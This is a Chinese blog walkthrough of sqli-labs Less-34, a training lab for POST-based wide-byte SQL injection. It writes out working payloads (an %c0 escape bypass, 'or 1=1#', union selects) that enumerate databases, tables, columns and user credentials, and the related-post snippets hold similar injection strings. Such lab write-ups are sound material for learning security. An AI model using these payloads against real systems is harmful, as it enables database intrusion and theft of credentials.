sqli-labs/Less-34

最新推荐文章于 2023-08-09 18:57:42 发布
最新推荐文章于 2023-08-09 18:57:42 发布
阅读量341 收藏 2
点赞数 2
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127956605
版权

这一关虽然属于宽字节注入 但是回归了post请求了 而且欢迎界面还是存在转义之后的样子和十六进制的样子

首先我们试试在username处输入admin' 转义之后变成了admin\'

所以我们进行宽字节注入将注入修改为admin%c0' 结果界面还是没有反应奇怪了我们抓包试试咯

抓包后的bp界面如下所示

看了以后瞬间懂了 原来是他会在我们的%c0前面加上了一个25 所以我们需要将其删除即可

 这样我们就能够看见报错信息了 如下所示

我们佐证一下我们的单引号想法吧

输入如下

admin%c0'--+

 还是报错了 为什么呢? 不懂为什么 看了看源代码也没有将注释符号进行过滤啊 所以我们加一个万能密码

输入如下

admin%c0' or 1=1#

回显如下

奇怪了哦 为什么只输出了一行数据 哦查看源代码发现虽然limit 0,1被注释掉了 但是后面还有一个mysql_fetch_array()函数 这个函数是从多个行组成的结果集中取出一行返回 也难怪只取了一行数据进行回显

然后我们知道了这个注入类型为单引号注入 接下来进行爆库操作 我选择联合注入

在进行爆库操作之前先进行回显点的判断

输入如下

admin%c0' union select 1,2 or 1=1#

 回显如下

这样看不出来回显点在哪里 我们得多试几个数 将1,2换成2,3

 

这下就是到只有login name为回显位了

然后开始爆库 输入如下

admin%c0' union select database(),2 or 1=1#

 回显如下

进行报表操作 输入如下

admin%c0' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() and 1=1#

回显如下

爆字段 输入如下

admin%c0' union select group_concat(column_name),2 from information_schema.columns where table_name=0x7573657273 and table_schema=database() and 1=1#

 回显如下

爆用户名和密码相关信息 输入如下

admin%c0' union select group_concat(username,password),2 from users where 1=1#

 回显如下

 最后我又发现了 除了那一处佐证单引号的步骤不能通过注释操作其他步骤都可以通过注释符进行注释 我也不懂为什么会这样啊 嗨嗨!!

axihaihai
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Sqli-labs靶场详细攻略Less 34-37
qq_41755084的博客
10-31 969
这一关还是进行宽字节注入,与上一关的区别在于使用了post方法进行传递。先试一下上一关的注入代码。因为这一关是登录,就使用之前的dumb账号。登陆失败了,也没报错,看一下这个包传递时post方法里参数是咋传的。可以看到,我们输入的注入代码在前端被进行了一个url编码,%被编码成了%25,原来的空格被替换成了+,原来的+被替换成了%2b那我们再把这个包改回来就好,+不用改回空格,在服务端会改回来的。并且经过尝试,这里的列数为2。注入成功。
Sqli-labs之Less-34
m0_46315342的博客
06-04 771
                                          &nbs...
sqli-labs(34)
weixin_30611509的博客
06-01 679
0x01构造闭合 同样 发现 ’被注释掉了 试探了一波发现什么信息都不会返回 正确错误的页面都一样 之前我们的方法就是将过滤函数添加的 \ 给吃掉。而get型的方式我们是以url形式提交的,因此数据会通过URLencode,如何将方法用在post型的注入当中,我们此处介绍一个新的方法。将utf-8转换为utf-16或 utf-32,例如将 ' 转为utf-16为�' ...
sqli-labs————Less-34(宽字节绕过、水平越权、盲注)
Fly_鹏程万里
05-19 2504
Less-34方法一:这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: �'。我们可以利用这一点注...
SQL-labs的第34关——报错注入 宽字节注入(POST)
qq_73393033的博客
08-09 336
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法中和反斜杠。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs (less-34)
kukudeshuo的博客
03-14 1527
sqli-labs (less-34) 进入34关,我们发现又回到了我们熟悉的页面,我们直接输入用户名和密码登入进去 像之前的关卡一样,我们输入的用户名和密码也是使用POST的方式传输到了服务器,所以我们继续使用hackbar工具抓取POST内容 在用户名的位置我们输入一个单引号试试,结果发现单引号被转义 那我们在密码的位置尝试输入一个单引号试试,结果发现也被转义 这里一般情况下就已经没有注入点了,但我们可以查看源代码看看这关是不是也使用了GBK编码 查看源代码可知确实使用了GBK编码,那就很简单
SQLi Labs Lesson32 & 33 & 34 & 35
1ame的博客
08-29 851
Lesson - 32 GET - By Pass custom filter adding slashes to dangerous chars
sqli-lab关卡记录
插销丸的博客
04-08 247
直接上 Less-1 通过‘‘1’’LIMIT 0,1’ 立即推理,‘1’‘LIMIT 0,1 分析格式为select from…where id=’?’ 加注释–+,验证成功 判断字段数为3 直接爆库 0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=d...
sqli-labs详细全解31-40
qq_38415434的博客
01-11 929
sqli-labs详细全解31-40 第三十一关: login.php 只对第一个参数进行了检测,而第二个参数并没有进行过滤。 payload:id=2&id=1") and 1=12-- - 第三十二关: f
sqli-labs33-40
willow_liang的博客
11-07 211
Less33 php函数了解 addslashes (PHP 4, PHP 5, PHP 7) addslashes — 使用反斜线引用字符串 说明 addslashes ( string $str ) : string 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。 一个使用 addslashes() 的例子是当你要往数据库中输入数据时。 例如,将名字 O'reilly 插入到数据库中,这就
SQL注入报错:Illegal mix of collations for operation ‘UNION‘ (sqli-labs靶场MySQL数据库
m0_47470899的博客
07-13 8845
问题背景: 在进行SQL注入时,发现注入点后,准备查询information_schema数据库中schema表中的数据库名(schema_name) 拼接url:http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(schema_name) ,3 from information_schema.schemata 发现报错:Illegal mix of collations for operation ‘UNION’ 解决办法: 查看数据库发现
SQLi LABS Less-34 报错注入
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第三十八关 SQLi38关
关于sqli-labs中报错Illegal mix of collations for operation ‘UNION‘原因剖析与验证
m0_63103606的博客
05-07 711
使用了union注入时报错如下:Illegal mix of collations for operation ‘UNION payload:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 看网上发现原因是security数据库中表格users的编码与info
sqli-labs/Less-28
最新发布
01-09
1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值